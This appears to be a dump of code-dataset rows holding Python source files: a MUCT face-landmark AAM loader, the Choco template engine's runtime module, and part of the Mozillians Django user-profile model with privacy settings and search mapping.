repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
doc-E-brown/FacialLandmarkingReview | experiments/Sec4_ModelDefinition/muctAAM.py | 1 | 2082 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# S.D.G
"""AAM test for MUCT dataset
:author: Ben Johnston
:license: 3-Clause BSD
"""
# Imports
import os
import menpo.io as mio
from aam import AAM
from menpofit.aam import HolisticAAM, PatchAAM
from sklearn.model_selection import train_test_split
MUCT_DATA_FOLDER = os.getenv('MUCT_DATA', '~/datasets/muct')
class MuctAAM(AAM):
""" MUCT AAM class """
def __init__(self, path_to_data=MUCT_DATA_FOLDER,
model_type=HolisticAAM, basename='muct_aam', verbose=True):
super(MuctAAM, self).__init__(
path_to_data, model_type, basename, verbose)
def load_data(self, crop_percentage=0.1,
test_set_ratio=0.3, max_images=None):
""" Load the images and landmarks in an menpo.io
format and crop the images using the specified
landmarks as a guide
Parameters
---------
"""
images = []
for i in mio.import_images(
self.filepath, max_images=max_images, verbose=self.verbose):
if i.landmarks['PTS'].lms.points.shape[0] != 76:
continue
i = i.crop_to_landmarks_proportion(crop_percentage)
# Convert to grayscale if required
if i.n_channels == 3:
i = i.as_greyscale() # Default to luminosity
images.append(i)
# Split into training and test sets
self.train_set, self.test_set =\
train_test_split(images, test_size=test_set_ratio, random_state=42)
def _crop_grayscale_images(self, filepath, crop_percentage):
images = []
for i in mio.import_images(
filepath, max_images=None, verbose=self.verbose):
i = i.crop_to_landmarks_proportion(crop_percentage)
# Convert to grayscale if required
if i.n_channels == 3:
i = i.as_greyscale() # Default to luminosity
# Due to large training set size use generators for better memory
# efficiency
yield i
| gpl-3.0 | -6,800,944,591,862,461,000 | 26.76 | 79 | 0.587896 | false |
whiteclover/Choco | choco/runtime.py | 1 | 28308 | # choco/runtime.py
# Copyright (C) 2006-2016 the Choco authors and contributors <see AUTHORS file>
#
# This module is part of Choco and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""provides runtime services for templates, including Context,
Namespace, and various helper functions."""
from choco import errors, util, compat
from choco.compat import compat_builtins
import sys
class Context(object):
"""Provides runtime namespace, output buffer, and various
callstacks for templates.
See :ref:`runtime_toplevel` for detail on the usage of
:class:`.Context`.
"""
def __init__(self, buffer, **data):
self._buffer_stack = [buffer]
self._data = data
self._kwargs = data.copy()
self._with_template = None
self._outputting_as_unicode = None
self.namespaces = {}
# "capture" function which proxies to the
# generic "capture" function
self._data['capture'] = compat.partial(capture, self)
# "caller" stack used by def calls with content
self.caller_stack = self._data['caller'] = CallerStack()
def _set_with_template(self, t):
self._with_template = t
illegal_names = t.reserved_names.intersection(self._data)
if illegal_names:
raise errors.NameConflictError(
"Reserved words passed to render(): %s" %
", ".join(illegal_names))
@property
def lookup(self):
"""Return the :class:`.TemplateLookup` associated
with this :class:`.Context`.
"""
return self._with_template.lookup
@property
def kwargs(self):
"""Return the dictionary of top level keyword arguments associated
with this :class:`.Context`.
This dictionary only includes the top-level arguments passed to
:meth:`.Template.render`. It does not include names produced within
the template execution such as local variable names or special names
such as ``self``, ``next``, etc.
The purpose of this dictionary is primarily for the case that
a :class:`.Template` accepts arguments via its ``<%page>`` tag,
which are normally expected to be passed via :meth:`.Template.render`,
except the template is being called in an inheritance context,
using the ``body()`` method. :attr:`.Context.kwargs` can then be
used to propagate these arguments to the inheriting template::
${next.body(**context.kwargs)}
"""
return self._kwargs.copy()
def push_caller(self, caller):
"""Push a ``caller`` callable onto the callstack for
this :class:`.Context`."""
self.caller_stack.append(caller)
def pop_caller(self):
"""Pop a ``caller`` callable onto the callstack for this
:class:`.Context`."""
del self.caller_stack[-1]
def keys(self):
"""Return a list of all names established in this :class:`.Context`."""
return list(self._data.keys())
def __getitem__(self, key):
if key in self._data:
return self._data[key]
else:
return compat_builtins.__dict__[key]
def _push_writer(self):
"""push a capturing buffer onto this Context and return
the new writer function."""
buf = util.FastEncodingBuffer()
self._buffer_stack.append(buf)
return buf.write
def _pop_buffer_and_writer(self):
"""pop the most recent capturing buffer from this Context
and return the current writer after the pop.
"""
buf = self._buffer_stack.pop()
return buf, self._buffer_stack[-1].write
def _push_buffer(self):
"""push a capturing buffer onto this Context."""
self._push_writer()
def _pop_buffer(self):
"""pop the most recent capturing buffer from this Context."""
return self._buffer_stack.pop()
def get(self, key, default=None):
"""Return a value from this :class:`.Context`."""
return self._data.get(key, compat_builtins.__dict__.get(key, default))
def write(self, string):
"""Write a string to this :class:`.Context` object's
underlying output buffer."""
self._buffer_stack[-1].write(string)
def writer(self):
"""Return the current writer function."""
return self._buffer_stack[-1].write
def _copy(self):
c = Context.__new__(Context)
c._buffer_stack = self._buffer_stack
c._data = self._data.copy()
c._kwargs = self._kwargs
c._with_template = self._with_template
c._outputting_as_unicode = self._outputting_as_unicode
c.namespaces = self.namespaces
c.caller_stack = self.caller_stack
return c
def _locals(self, d):
"""Create a new :class:`.Context` with a copy of this
:class:`.Context`'s current state,
updated with the given dictionary.
The :attr:`.Context.kwargs` collection remains
unaffected.
"""
if not d:
return self
c = self._copy()
c._data.update(d)
return c
def _clean_inheritance_tokens(self):
"""create a new copy of this :class:`.Context`. with
tokens related to inheritance state removed."""
c = self._copy()
x = c._data
x.pop('self', None)
x.pop('parent', None)
x.pop('next', None)
return c
class CallerStack(list):
def __init__(self):
self.nextcaller = None
def __nonzero__(self):
return self.__bool__()
def __bool__(self):
return len(self) and self._get_caller() and True or False
def _get_caller(self):
# this method can be removed once
# codegen MAGIC_NUMBER moves past 7
return self[-1]
def __getattr__(self, key):
return getattr(self._get_caller(), key)
def _push_frame(self):
frame = self.nextcaller or None
self.append(frame)
self.nextcaller = None
return frame
def _pop_frame(self):
self.nextcaller = self.pop()
class Undefined(object):
"""Represents an undefined value in a template.
All template modules have a constant value
``UNDEFINED`` present which is an instance of this
object.
"""
def __str__(self):
raise NameError("Undefined")
def __nonzero__(self):
return self.__bool__()
def __bool__(self):
return False
UNDEFINED = Undefined()
STOP_RENDERING = ""
class LoopStack(object):
"""a stack for LoopContexts that implements the context manager protocol
to automatically pop off the top of the stack on context exit
"""
def __init__(self):
self.stack = []
def _enter(self, iterable):
self._push(iterable)
return self._top
def _exit(self):
self._pop()
return self._top
@property
def _top(self):
if self.stack:
return self.stack[-1]
else:
return self
def _pop(self):
return self.stack.pop()
def _push(self, iterable):
new = LoopContext(iterable)
if self.stack:
new.parent = self.stack[-1]
return self.stack.append(new)
def __getattr__(self, key):
raise errors.RuntimeException("No loop context is established")
def __iter__(self):
return iter(self._top)
class LoopContext(object):
"""A magic loop variable.
Automatically accessible in any ``% for`` block.
See the section :ref:`loop_context` for usage
notes.
:attr:`parent` -> :class:`.LoopContext` or ``None``
The parent loop, if one exists.
:attr:`index` -> `int`
The 0-based iteration count.
:attr:`reverse_index` -> `int`
The number of iterations remaining.
:attr:`first` -> `bool`
``True`` on the first iteration, ``False`` otherwise.
:attr:`last` -> `bool`
``True`` on the last iteration, ``False`` otherwise.
:attr:`even` -> `bool`
``True`` when ``index`` is even.
:attr:`odd` -> `bool`
``True`` when ``index`` is odd.
"""
def __init__(self, iterable):
self._iterable = iterable
self.index = 0
self.parent = None
def __iter__(self):
for i in self._iterable:
yield i
self.index += 1
@util.memoized_instancemethod
def __len__(self):
return len(self._iterable)
@property
def reverse_index(self):
return len(self) - self.index - 1
@property
def first(self):
return self.index == 0
@property
def last(self):
return self.index == len(self) - 1
@property
def even(self):
return not self.odd
@property
def odd(self):
return bool(self.index % 2)
def cycle(self, *values):
"""Cycle through values as the loop progresses.
"""
if not values:
raise ValueError("You must provide values to cycle through")
return values[self.index % len(values)]
class _NSAttr(object):
def __init__(self, parent):
self.__parent = parent
def __getattr__(self, key):
ns = self.__parent
while ns:
if hasattr(ns.module, key):
return getattr(ns.module, key)
else:
ns = ns.inherits
raise AttributeError(key)
class Namespace(object):
"""Provides access to collections of rendering methods, which
can be local, from other templates, or from imported modules.
To access a particular rendering method referenced by a
:class:`.Namespace`, use plain attribute access:
.. sourcecode:: choco
${some_namespace.foo(x, y, z)}
:class:`.Namespace` also contains several built-in attributes
described here.
"""
def __init__(self, name, context,
callables=None, inherits=None,
populate_self=True, calling_uri=None):
self.name = name
self.context = context
self.inherits = inherits
if callables is not None:
self.callables = dict([(c.__name__, c) for c in callables])
callables = ()
module = None
"""The Python module referenced by this :class:`.Namespace`.
If the namespace references a :class:`.Template`, then
this module is the equivalent of ``template.module``,
i.e. the generated module for the template.
"""
template = None
"""The :class:`.Template` object referenced by this
:class:`.Namespace`, if any.
"""
context = None
"""The :class:`.Context` object for this :class:`.Namespace`.
Namespaces are often created with copies of contexts that
contain slightly different data, particularly in inheritance
scenarios. Using the :class:`.Context` off of a :class:`.Namespace` one
can traverse an entire chain of templates that inherit from
one-another.
"""
filename = None
"""The path of the filesystem file used for this
:class:`.Namespace`'s module or template.
If this is a pure module-based
:class:`.Namespace`, this evaluates to ``module.__file__``. If a
template-based namespace, it evaluates to the original
template file location.
"""
uri = None
"""The URI for this :class:`.Namespace`'s template.
I.e. whatever was sent to :meth:`.TemplateLookup.get_template()`.
This is the equivalent of :attr:`.Template.uri`.
"""
_templateuri = None
@util.memoized_property
def attr(self):
"""Access module level attributes by name.
This accessor allows templates to supply "scalar"
attributes which are particularly handy in inheritance
relationships.
.. seealso::
:ref:`inheritance_attr`
:ref:`namespace_attr_for_includes`
"""
return _NSAttr(self)
def get_namespace(self, uri):
"""Return a :class:`.Namespace` corresponding to the given ``uri``.
If the given ``uri`` is a relative URI (i.e. it does not
contain a leading slash ``/``), the ``uri`` is adjusted to
be relative to the ``uri`` of the namespace itself. This
method is therefore mostly useful off of the built-in
``local`` namespace, described in :ref:`namespace_local`.
In
most cases, a template wouldn't need this function, and
should instead use the ``<%namespace>`` tag to load
namespaces. However, since all ``<%namespace>`` tags are
evaluated before the body of a template ever runs,
this method can be used to locate namespaces using
expressions that were generated within the body code of
the template, or to conditionally use a particular
namespace.
"""
key = (self, uri)
if key in self.context.namespaces:
return self.context.namespaces[key]
else:
ns = TemplateNamespace(uri, self.context._copy(),
templateuri=uri,
calling_uri=self._templateuri)
self.context.namespaces[key] = ns
return ns
def get_template(self, uri):
"""Return a :class:`.Template` from the given ``uri``.
The ``uri`` resolution is relative to the ``uri`` of this
:class:`.Namespace` object's :class:`.Template`.
"""
return _lookup_template(self.context, uri, self._templateuri)
def get_cached(self, key, **kwargs):
"""Return a value from the :class:`.Cache` referenced by this
:class:`.Namespace` object's :class:`.Template`.
The advantage to this method versus direct access to the
:class:`.Cache` is that the configuration parameters
declared in ``<%page>`` take effect here, thereby calling
up the same configured backend as that configured
by ``<%page>``.
"""
return self.cache.get(key, **kwargs)
@property
def cache(self):
"""Return the :class:`.Cache` object referenced
by this :class:`.Namespace` object's
:class:`.Template`.
"""
return self.template.cache
def include_file(self, uri, **kwargs):
"""Include a file at the given ``uri``."""
_include_file(self.context, uri, self._templateuri, **kwargs)
def _populate(self, d, l):
for ident in l:
if ident == '*':
for (k, v) in self._get_star():
d[k] = v
else:
d[ident] = getattr(self, ident)
def _get_star(self):
if self.callables:
for key in self.callables:
yield (key, self.callables[key])
def __getattr__(self, key):
if key in self.callables:
val = self.callables[key]
elif self.inherits:
val = getattr(self.inherits, key)
else:
raise AttributeError(
"Namespace '%s' has no member '%s'" %
(self.name, key))
setattr(self, key, val)
return val
class TemplateNamespace(Namespace):
"""A :class:`.Namespace` specific to a :class:`.Template` instance."""
def __init__(self, name, context, template=None, templateuri=None,
callables=None, inherits=None,
populate_self=True, calling_uri=None):
self.name = name
self.context = context
self.inherits = inherits
if callables is not None:
self.callables = dict([(c.__name__, c) for c in callables])
if templateuri is not None:
self.template = _lookup_template(context, templateuri,
calling_uri)
self._templateuri = self.template.module._template_uri
elif template is not None:
self.template = template
self._templateuri = template.module._template_uri
else:
raise TypeError("'template' argument is required.")
if populate_self:
lclcallable, lclcontext = \
_populate_self_namespace(context, self.template,
self_ns=self)
@property
def module(self):
"""The Python module referenced by this :class:`.Namespace`.
If the namespace references a :class:`.Template`, then
this module is the equivalent of ``template.module``,
i.e. the generated module for the template.
"""
return self.template.module
@property
def filename(self):
"""The path of the filesystem file used for this
:class:`.Namespace`'s module or template.
"""
return self.template.filename
@property
def uri(self):
"""The URI for this :class:`.Namespace`'s template.
I.e. whatever was sent to :meth:`.TemplateLookup.get_template()`.
This is the equivalent of :attr:`.Template.uri`.
"""
return self.template.uri
def _get_star(self):
if self.callables:
for key in self.callables:
yield (key, self.callables[key])
def get(key):
callable_ = self.template._get_def_callable(key)
return compat.partial(callable_, self.context)
for k in self.template.module._exports:
yield (k, get(k))
def __getattr__(self, key):
if key in self.callables:
val = self.callables[key]
elif self.template.has_def(key):
callable_ = self.template._get_def_callable(key)
val = compat.partial(callable_, self.context)
elif self.inherits:
val = getattr(self.inherits, key)
else:
raise AttributeError(
"Namespace '%s' has no member '%s'" %
(self.name, key))
setattr(self, key, val)
return val
class ModuleNamespace(Namespace):
"""A :class:`.Namespace` specific to a Python module instance."""
def __init__(self, name, context, module,
callables=None, inherits=None,
populate_self=True, calling_uri=None):
self.name = name
self.context = context
self.inherits = inherits
if callables is not None:
self.callables = dict([(c.__name__, c) for c in callables])
mod = __import__(module)
for token in module.split('.')[1:]:
mod = getattr(mod, token)
self.module = mod
@property
def filename(self):
"""The path of the filesystem file used for this
:class:`.Namespace`'s module or template.
"""
return self.module.__file__
def _get_star(self):
if self.callables:
for key in self.callables:
yield (key, self.callables[key])
for key in dir(self.module):
if key[0] != '_':
callable_ = getattr(self.module, key)
if compat.callable(callable_):
yield key, compat.partial(callable_, self.context)
def __getattr__(self, key):
if key in self.callables:
val = self.callables[key]
elif hasattr(self.module, key):
callable_ = getattr(self.module, key)
val = compat.partial(callable_, self.context)
elif self.inherits:
val = getattr(self.inherits, key)
else:
raise AttributeError(
"Namespace '%s' has no member '%s'" %
(self.name, key))
setattr(self, key, val)
return val
def supports_caller(func):
"""Apply a caller_stack compatibility decorator to a plain
Python function.
See the example in :ref:`namespaces_python_modules`.
"""
def wrap_stackframe(context, *args, **kwargs):
context.caller_stack._push_frame()
try:
return func(context, *args, **kwargs)
finally:
context.caller_stack._pop_frame()
return wrap_stackframe
def capture(context, callable_, *args, **kwargs):
"""Execute the given template def, capturing the output into
a buffer.
See the example in :ref:`namespaces_python_modules`.
"""
if not compat.callable(callable_):
raise errors.RuntimeException(
"capture() function expects a callable as "
"its argument (i.e. capture(func, *args, **kwargs))"
)
context._push_buffer()
try:
callable_(*args, **kwargs)
finally:
buf = context._pop_buffer()
return buf.getvalue()
def _decorate_toplevel(fn):
def decorate_render(render_fn):
def go(context, *args, **kw):
def y(*args, **kw):
return render_fn(context, *args, **kw)
try:
y.__name__ = render_fn.__name__[7:]
except TypeError:
# < Python 2.4
pass
return fn(y)(context, *args, **kw)
return go
return decorate_render
def _decorate_inline(context, fn):
def decorate_render(render_fn):
dec = fn(render_fn)
def go(*args, **kw):
return dec(context, *args, **kw)
return go
return decorate_render
def _include_file(context, uri, calling_uri, **kwargs):
"""locate the template from the given uri and include it in
the current output."""
template = _lookup_template(context, uri, calling_uri)
(callable_, ctx) = _populate_self_namespace(
context._clean_inheritance_tokens(),
template)
callable_(ctx, **_kwargs_for_include(callable_, context._data, **kwargs))
def _include_ui(context, ui, template_uri, *args, **kwargs):
uicls = _lookup_uicls(context, ui)
ui_module = uicls(context)
ui_module._execute(*args, **kwargs)
def _inherit_from(context, uri, calling_uri):
"""called by the _inherit method in template modules to set
up the inheritance chain at the start of a template's
execution."""
if uri is None:
return None
template = _lookup_template(context, uri, calling_uri)
self_ns = context['self']
ih = self_ns
while ih.inherits is not None:
ih = ih.inherits
lclcontext = context._locals({'next': ih})
ih.inherits = TemplateNamespace("self:%s" % template.uri,
lclcontext,
template=template,
populate_self=False)
context._data['parent'] = lclcontext._data['local'] = ih.inherits
callable_ = getattr(template.module, '_choco_inherit', None)
if callable_ is not None:
ret = callable_(template, lclcontext)
if ret:
return ret
gen_ns = getattr(template.module, '_choco_generate_namespaces', None)
if gen_ns is not None:
gen_ns(context)
return (template.callable_, lclcontext)
def _lookup_uicls(context, ui):
lookup = context._with_template.lookup
if lookup is None:
raise errors.TemplateLookupException(
"Template '%s' has no TemplateLookup associated" %
context._with_template.uri)
uicls = lookup.get_ui(ui)
return uicls
def _lookup_template(context, uri, relativeto):
lookup = context._with_template.lookup
if lookup is None:
raise errors.TemplateLookupException(
"Template '%s' has no TemplateLookup associated" %
context._with_template.uri)
uri = lookup.adjust_uri(uri, relativeto)
try:
return lookup.get_template(uri)
except errors.TopLevelLookupException:
raise errors.TemplateLookupException(str(compat.exception_as()))
def _populate_self_namespace(context, template, self_ns=None):
if self_ns is None:
self_ns = TemplateNamespace('self:%s' % template.uri,
context, template=template,
populate_self=False)
context._data['self'] = context._data['local'] = self_ns
if hasattr(template.module, '_choco_inherit'):
ret = template.module._choco_inherit(template, context)
if ret:
return ret
return (template.callable_, context)
def _render(template, callable_, args, data, as_unicode=False):
"""create a Context and return the string
output of the given template and template callable."""
if as_unicode:
buf = util.FastEncodingBuffer(as_unicode=True)
elif template.bytestring_passthrough:
buf = compat.StringIO()
else:
buf = util.FastEncodingBuffer(
as_unicode=as_unicode,
encoding=template.output_encoding,
errors=template.encoding_errors)
context = Context(buf, **data)
context._outputting_as_unicode = as_unicode
context._set_with_template(template)
_render_context(template, callable_, context, *args,
**_kwargs_for_callable(callable_, data))
return context._pop_buffer().getvalue()
def _render_ui(template, callable_, pctx, args, data):
context = Context(pctx._buffer_stack[-1], **data)
context._outputting_as_unicode = pctx._outputting_as_unicode
context._set_with_template(template)
_render_context(template, callable_, context)
def _kwargs_for_callable(callable_, data):
argspec = compat.inspect_func_args(callable_)
# for normal pages, **pageargs is usually present
if argspec[2]:
return data
# for rendering defs from the top level, figure out the args
namedargs = argspec[0] + [v for v in argspec[1:3] if v is not None]
kwargs = {}
for arg in namedargs:
if arg != 'context' and arg in data and arg not in kwargs:
kwargs[arg] = data[arg]
return kwargs
def _kwargs_for_include(callable_, data, **kwargs):
argspec = compat.inspect_func_args(callable_)
namedargs = argspec[0] + [v for v in argspec[1:3] if v is not None]
for arg in namedargs:
if arg != 'context' and arg in data and arg not in kwargs:
kwargs[arg] = data[arg]
return kwargs
def _render_context(tmpl, callable_, context, *args, **kwargs):
import choco.template as template
# create polymorphic 'self' namespace for this
# template with possibly updated context
if not isinstance(tmpl, template.DefTemplate):
# if main render method, call from the base of the inheritance stack
(inherit, lclcontext) = _populate_self_namespace(context, tmpl)
_exec_template(inherit, lclcontext, args=args, kwargs=kwargs)
else:
# otherwise, call the actual rendering method specified
(inherit, lclcontext) = _populate_self_namespace(context, tmpl.parent)
_exec_template(callable_, context, args=args, kwargs=kwargs)
def _exec_template(callable_, context, args=None, kwargs=None):
"""execute a rendering callable given the callable, a
Context, and optional explicit arguments
the contextual Template will be located if it exists, and
the error handling options specified on that Template will
be interpreted here.
"""
template = context._with_template
if template is not None and \
(template.format_errors or template.error_handler):
try:
callable_(context, *args, **kwargs)
except Exception:
_render_error(template, context, compat.exception_as())
except:
e = sys.exc_info()[0]
_render_error(template, context, e)
else:
callable_(context, *args, **kwargs)
def _render_error(template, context, error):
if template.error_handler:
result = template.error_handler(context, error)
if not result:
compat.reraise(*sys.exc_info())
else:
error_template = errors.html_error_template()
if context._outputting_as_unicode:
context._buffer_stack[:] = [
util.FastEncodingBuffer(as_unicode=True)]
else:
context._buffer_stack[:] = [util.FastEncodingBuffer(
error_template.output_encoding,
error_template.encoding_errors)]
context._set_with_template(error_template)
error_template.render_context(context, error=error)
| mit | -24,096,702,235,384,970 | 29.50431 | 79 | 0.593966 | false |
glogiotatidis/mozillians-new | mozillians/users/models.py | 1 | 18988 | import os
import uuid
from datetime import datetime
from django.conf import settings
from django.contrib.auth.models import User
from django.core.mail import send_mail
from django.db import models
from django.db.models import signals as dbsignals
from django.dispatch import receiver
from elasticutils.contrib.django import S, get_es
from elasticutils.contrib.django.models import SearchMixin
from funfactory.urlresolvers import reverse
from product_details import product_details
from sorl.thumbnail import ImageField, get_thumbnail
from tower import ugettext as _, ugettext_lazy as _lazy
from mozillians.common.helpers import gravatar
from mozillians.groups.models import (Group, GroupAlias,
Skill, SkillAlias,
Language, LanguageAlias)
from mozillians.users import (EMPLOYEES, MOZILLIANS, PUBLIC, PRIVACY_CHOICES,
DEFAULT_PRIVACY_FIELDS, PUBLIC_INDEXABLE_FIELDS)
from mozillians.users.managers import UserProfileManager
from mozillians.users.tasks import (update_basket_task, index_objects,
unindex_objects)
COUNTRIES = product_details.get_regions('en-US')
USERNAME_MAX_LENGTH = 30
AVATAR_SIZE = (300, 300)
def _calculate_photo_filename(instance, filename):
"""Generate a unique filename for uploaded photo."""
return os.path.join(settings.USER_AVATAR_DIR, str(uuid.uuid4()) + '.jpg')
class PrivacyField(models.PositiveSmallIntegerField):
def __init__(self, *args, **kwargs):
myargs = {'default': MOZILLIANS,
'choices': PRIVACY_CHOICES}
myargs.update(kwargs)
return super(PrivacyField, self).__init__(*args, **myargs)
class PrivacyAwareS(S):
def privacy_level(self, level=MOZILLIANS):
"""Set privacy level for query set."""
self._privacy_level = level
return self
def _clone(self, *args, **kwargs):
new = super(PrivacyAwareS, self)._clone(*args, **kwargs)
new._privacy_level = getattr(self, '_privacy_level', None)
return new
def __iter__(self):
self._iterator = super(PrivacyAwareS, self).__iter__()
def _generator():
while True:
obj = self._iterator.next()
obj._privacy_level = getattr(self, '_privacy_level', None)
yield obj
return _generator()
class UserProfilePrivacyModel(models.Model):
_privacy_fields = DEFAULT_PRIVACY_FIELDS
_privacy_level = None
privacy_photo = PrivacyField()
privacy_full_name = PrivacyField()
privacy_ircname = PrivacyField()
privacy_email = PrivacyField()
privacy_website = PrivacyField()
privacy_bio = PrivacyField()
privacy_city = PrivacyField()
privacy_region = PrivacyField()
privacy_country = PrivacyField()
privacy_groups = PrivacyField()
privacy_skills = PrivacyField()
privacy_languages = PrivacyField()
privacy_vouched_by = PrivacyField()
class Meta:
abstract=True
class UserProfile(UserProfilePrivacyModel, SearchMixin):
objects = UserProfileManager()
user = models.OneToOneField(User)
full_name = models.CharField(max_length=255, default='', blank=False,
verbose_name=_lazy(u'Full Name'))
is_vouched = models.BooleanField(default=False)
last_updated = models.DateTimeField(auto_now=True, default=datetime.now)
website = models.URLField(max_length=200, verbose_name=_lazy(u'Website'),
default='', blank=True)
vouched_by = models.ForeignKey('UserProfile', null=True, default=None,
on_delete=models.SET_NULL, blank=True,
related_name='vouchees')
date_vouched = models.DateTimeField(null=True, blank=True, default=None)
groups = models.ManyToManyField(Group, blank=True, related_name='members')
skills = models.ManyToManyField(Skill, blank=True, related_name='members')
languages = models.ManyToManyField(Language, blank=True,
related_name='members')
bio = models.TextField(verbose_name=_lazy(u'Bio'), default='', blank=True)
photo = ImageField(default='', blank=True,
upload_to=_calculate_photo_filename)
ircname = models.CharField(max_length=63,
verbose_name=_lazy(u'IRC Nickname'),
default='', blank=True)
country = models.CharField(max_length=50, default='',
choices=COUNTRIES.items(),
verbose_name=_lazy(u'Country'))
region = models.CharField(max_length=255, default='', blank=True,
verbose_name=_lazy(u'Province/State'))
city = models.CharField(max_length=255, default='', blank=True,
verbose_name=_lazy(u'City'))
allows_community_sites = models.BooleanField(
default=True,
verbose_name=_lazy(u'Sites that can determine my vouched status'),
choices=((True, _lazy(u'All Community Sites')),
(False, _lazy(u'Only Mozilla Properties'))))
allows_mozilla_sites = models.BooleanField(
default=True,
verbose_name=_lazy(u'Allow Mozilla sites to access my profile data?'),
choices=((True, _lazy(u'Yes')), (False, _lazy(u'No'))))
basket_token = models.CharField(max_length=1024, default='', blank=True)
class Meta:
db_table = 'profile'
ordering = ['full_name']
def __getattribute__(self, attrname):
_getattr = (lambda x:
super(UserProfile, self).__getattribute__(x))
privacy_fields = _getattr('_privacy_fields')
privacy_level = _getattr('_privacy_level')
if privacy_level is not None and attrname in privacy_fields:
field_privacy = _getattr('privacy_%s' % attrname)
if field_privacy < privacy_level:
return privacy_fields.get(attrname)
return super(UserProfile, self).__getattribute__(attrname)
@classmethod
def extract_document(cls, obj_id, obj=None):
"""Method used by elasticutils."""
if obj is None:
obj = cls.objects.get(pk=obj_id)
d = {}
attrs = ('id', 'is_vouched', 'website', 'ircname',
'region', 'city', 'allows_mozilla_sites',
'allows_community_sites')
for a in attrs:
data = getattr(obj, a)
if isinstance(data, basestring):
data = data.lower()
d.update({a: data})
if obj.country:
d.update({'country':
[obj.country, COUNTRIES[obj.country].lower()]})
# user data
attrs = ('username', 'email', 'last_login', 'date_joined')
for a in attrs:
data = getattr(obj.user, a)
if isinstance(data, basestring):
data = data.lower()
d.update({a: data})
d.update(dict(fullname=obj.full_name.lower()))
d.update(dict(name=obj.full_name.lower()))
d.update(dict(bio=obj.bio))
d.update(dict(has_photo=bool(obj.photo)))
for attribute in ['groups', 'skills', 'languages']:
groups = []
for g in getattr(obj, attribute).all():
groups.extend(g.aliases.values_list('name', flat=True))
d[attribute] = groups
return d
@classmethod
def get_mapping(cls):
"""Returns an ElasticSearch mapping."""
return {
'properties': {
'id': {'type': 'integer'},
'name': {'type': 'string', 'index': 'not_analyzed'},
'fullname': {'type': 'string', 'analyzer': 'standard'},
'email': {'type': 'string', 'index': 'not_analyzed'},
'ircname': {'type': 'string', 'index': 'not_analyzed'},
'username': {'type': 'string', 'index': 'not_analyzed'},
'country': {'type': 'string', 'analyzer': 'whitespace'},
'region': {'type': 'string', 'analyzer': 'whitespace'},
'city': {'type': 'string', 'analyzer': 'whitespace'},
'skills': {'type': 'string', 'analyzer': 'whitespace'},
'groups': {'type': 'string', 'analyzer': 'whitespace'},
'languages': {'type': 'string', 'index': 'not_analyzed'},
'bio': {'type': 'string', 'analyzer': 'snowball'},
'is_vouched': {'type': 'boolean'},
'allows_mozilla_sites': {'type': 'boolean'},
'allows_community_sites': {'type': 'boolean'},
'photo': {'type': 'boolean'},
'website': {'type': 'string', 'index': 'not_analyzed'},
'last_updated': {'type': 'date'},
'date_joined': {'type': 'date'}}}
@classmethod
def search(cls, query, include_non_vouched=False, public=False):
"""Sensible default search for UserProfiles."""
query = query.lower().strip()
fields = ('username', 'bio__text', 'email', 'ircname',
'country__text', 'country__text_phrase',
'region__text', 'region__text_phrase',
'city__text', 'city__text_phrase',
'fullname__text', 'fullname__text_phrase',
'fullname__prefix', 'fullname__fuzzy'
'groups__text')
s = PrivacyAwareS(cls)
if public:
s = s.privacy_level(PUBLIC)
s = s.indexes(cls.get_index(public))
if query:
q = dict((field, query) for field in fields)
s = (s.boost(fullname__text_phrase=5, username=5, email=5,
ircname=5, fullname__text=4, country__text_phrase=4,
region__text_phrase=4, city__text_phrase=4,
fullname__prefix=3, fullname__fuzzy=2,
bio__text=2).query(or_=q))
s = s.order_by('_score', 'name')
if not include_non_vouched:
s = s.filter(is_vouched=True)
return s
@property
def email(self):
"""Privacy aware email property."""
if self._privacy_level and self.privacy_email < self._privacy_level:
return self._privacy_fields['email']
return self.user.email
@property
def display_name(self):
return self.full_name
@property
def privacy_level(self):
"""Return user privacy clearance."""
if self.groups.filter(name='staff').exists():
return EMPLOYEES
if self.is_vouched:
return MOZILLIANS
return PUBLIC
@property
def is_complete(self):
"""Tests if a user has all the information needed to move on
past the original registration view.
"""
return self.display_name.strip() != ''
@property
def is_public(self):
"""Return True is any of the privacy protected fields is PUBLIC."""
for field in self._privacy_fields:
if getattr(self, 'privacy_%s' % field, None) == PUBLIC:
return True
return False
@property
def is_public_indexable(self):
"""For profile to be public indexable should have at least
full_name OR ircname OR email set to PUBLIC.
"""
for field in PUBLIC_INDEXABLE_FIELDS:
if (getattr(self, 'privacy_%s' % field, None) == PUBLIC and
getattr(self, field, None)):
return True
return False
def __unicode__(self):
"""Return this user's name when their profile is called."""
return self.display_name
def get_absolute_url(self):
return reverse('profile', args=[self.user.username])
def anonymize(self):
"""Remove personal info from a user"""
for name in ['first_name', 'last_name', 'email']:
setattr(self.user, name, '')
self.full_name = ''
# Give a random username
self.user.username = uuid.uuid4().hex[:30]
self.user.is_active = False
self.user.save()
for f in self._meta.fields:
if not f.editable or f.name in ['id', 'user']:
continue
if f.default == models.fields.NOT_PROVIDED:
raise Exception('No default value for %s' % f.name)
setattr(self, f.name, f.default)
for f in self._meta.many_to_many:
getattr(self, f.name).clear()
self.save()
def set_instance_privacy_level(self, level):
"""Sets privacy level of instance."""
self._privacy_level = level
def set_privacy_level(self, level, save=True):
"""Sets all privacy enabled fields to 'level'."""
for field in self._privacy_fields:
setattr(self, 'privacy_%s' % field, level)
if save:
self.save()
def set_membership(self, model, membership_list):
"""Alters membership to Groups, Skills and Languages."""
if model is Group:
m2mfield = self.groups
alias_model = GroupAlias
elif model is Skill:
m2mfield = self.skills
alias_model = SkillAlias
elif model is Language:
m2mfield = self.languages
alias_model = LanguageAlias
# Remove any non-system groups that weren't supplied in this list.
m2mfield.remove(*[g for g in m2mfield.all()
if g.name not in membership_list
and not getattr(g, 'system', False)])
# Add/create the rest of the groups
groups_to_add = []
for g in membership_list:
if alias_model.objects.filter(name=g).exists():
group = alias_model.objects.get(name=g).alias
else:
group = model.objects.create(name=g)
if not getattr(g, 'system', False):
groups_to_add.append(group)
m2mfield.add(*groups_to_add)
def get_photo_thumbnail(self, geometry='160x160', **kwargs):
if 'crop' not in kwargs:
